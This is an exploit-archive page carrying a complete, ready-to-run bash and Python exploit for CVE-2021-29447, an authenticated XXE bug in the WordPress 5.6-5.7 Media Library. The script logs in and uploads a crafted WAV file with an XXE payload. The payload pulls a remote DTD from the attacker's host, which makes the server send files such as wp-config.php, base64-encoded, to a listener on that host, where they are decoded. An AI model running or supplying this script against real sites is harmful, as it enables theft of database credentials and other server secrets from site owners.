wordpress 5.7 media library xml external entity injection (xxe) (authenticated)

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wordpress 5.7 media library xml external entity injection (xxe) (authenticated) Code Code...
# Exploit Title: WordPress 5.7 - 'Media Library' XML External Entity Injection (XXE) (Authenticated) # Date: 16/09/2021 # Exploit Author: David Utón (M3n0sD0n4ld) # Vendor Homepage: https://wordpress.com # Affected Version: WordPress 5.6-5.7 & PHP8 # Tested on: Linux Ubuntu 18.04.5 LTS # CVE : CVE-2021-29447 #!/bin/bash # Author: @David_Uton (m3n0sd0n4ld) # Usage: $./CVE-2021-29447.sh TARGET WP_USERNAME WP_PASSWORD PATH/FILE.EXT LHOST # Example: $ ./CVE-2021-29447.sh 10.10.XX.XX wptest test ../wp-config.php 10.11.XX.XX # Variables rHost=$1 username=$2 password=$3 readFile=$4 lHost=$5 # Functions # Logotype logoType(){ echo " ===================================== CVE-2021-29447 - WordPress 5.6-5.7 - XXE & SSRF Within the Media Library (Authenticated) ------------------------------------- @David_Uton (M3n0sD0n4ld) https://m3n0sd0n4ld.github.io/ =====================================" } # Create wav malicious wavCreate(){ echo -en "RIFF\xb8\x00\x00\x00WAVEiXML\x7b\x00\x00\x00<?xml version='1.0'?><!DOCTYPE ANY[<!ENTITY % remote SYSTEM 'http://$lHost:8000/xx3.dtd'>%remote;%init;%trick;]>\x00" > payload.wav && echo "[+] Create payload.wav" } # Create xx3.dtd dtdCreate(){ cat <<EOT > xx3.dtd <!ENTITY % file SYSTEM "php://filter/zlib.deflate/read=convert.base64-encode/resource=$readFile"> <!ENTITY % init "<!ENTITY &#x25; trick SYSTEM 'http://$lHost:8000/?p=%file;'>" > EOT } # wav upload wavUpload(){ cat <<EOT > .upload.py #/usr/bin/env python3 import requests, re, sys postData = { 'log':"$username", 'pwd':"$password", 'wp-submit':'Log In', 'redirect_to':'http://$rHost/wp-admin/', 'testcookie':1 } r = requests.post('http://$rHost/wp-login.php',data=postData, verify=False) # SSL == verify=True cookies = r.cookies print("[+] Getting Wp Nonce ... ") res = requests.get('http://$rHost/wp-admin/media-new.php',cookies=cookies) wp_nonce_list = re.findall(r'name="_wpnonce" value="(\w+)"',res.text) if len(wp_nonce_list) == 0 : print("[-] Failed to retrieve the _wpnonce") exit(0) else : wp_nonce = wp_nonce_list[0] print("[+] Wp Nonce retrieved successfully ! _wpnonce : " + wp_nonce) print("[+] Uploading the wav file ... ") postData = { 'name': 'payload.wav', 'action': 'upload-attachment', '_wpnonce': wp_nonce } wav = {'async-upload': ('payload.wav', open('payload.wav', 'rb'))} r_upload = requests.post('http://$rHost/wp-admin/async-upload.php', data=postData, files=wav, cookies=cookies) if r_upload.status_code == 200: image_id = re.findall(r'{"id":(\d+),',r_upload.text)[0] _wp_nonce=re.findall(r'"update":"(\w+)"',r_upload.text)[0] print('[+] Wav uploaded successfully') else : print("[-] Failed to receive a response for uploaded! Try again . \n") exit(0) EOT python3 .upload.py } # Server Sniffer serverSniffer(){ statusServer=$(python3 -m http.server &> http.server.log & echo $! > http.server.pid) } # Load file and decoder loadFile(){ content="http.server.log" wavUpload while : do if [[ -s $content ]]; then echo "[+] Obtaining file information..." sleep 5s # Increase time if the server is slow base64=$(cat $content | grep -i '?p=' | cut -d '=' -f2 | cut -d ' ' -f1 | sort -u) # Check file exists echo "<?php echo zlib_decode(base64_decode('$base64')); ?>" > decode.php sizeCheck=$(wc -c decode.php | awk '{printf $1}') if [[ $sizeCheck -gt "46" ]]; then php decode.php else echo "[!] File does not exist or is not allowed to be read." fi break fi done } # Cleanup cleanup(){ kill $(cat http.server.pid) &>/dev/null rm http.server.log http.server.pid &>/dev/null rm xx3.dtd payload.wav .upload.py decode.php .cookies.tmp &>/dev/null } # Execute logoType # Checking parameters if [[ $# -ne 5 ]];then echo "[!] Parameters are missing!!!" echo "" echo "$ ./CVE-2021-29447.sh TARGET WP_USERNAME WP_PASSWORD PATH/FILE.EXT LHOST" else # Test Connection... echo "[*] Test connection to WordPress..." # WP Auth authCheck=$(curl -i -s -k -X $'POST' \ -H "Host: $rHost" -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H "Referer: http://$rHost/wp-login.php" -H $'Content-Type: application/x-www-form-urlencoded' -H $'Content-Length: 79' -H "Origin: http://$rHost" -H $'Connection: close' -H $'Upgrade-Insecure-Requests: 1' \ -b $'wordpress_test_cookie=WP%20Cookie%20check' \ --data-binary "log=$username&pwd=$password&wp-submit=Log+In&redirect_to=%2Fwp-admin%2F&testcookie=1" \ "http://$rHost/wp-login.php" > .cookies.tmp) auth=$(head -n 1 .cookies.tmp | awk '{ printf $2 }') # Running authentication with WordPress. if [[ $auth != "302" ]]; then echo "[-] Authentication failed ! Check username and password" else echo "[+] Authentication successfull!!!" # Create wav & dtd file wavCreate dtdCreate serverSniffer loadFile cleanup fi fi

Wordpress 5.7 media library xml external entity injection (xxe) (authenticated) Vulnerability / Exploit Source : Wordpress 5.7 media library xml external entity injection (xxe) (authenticated)

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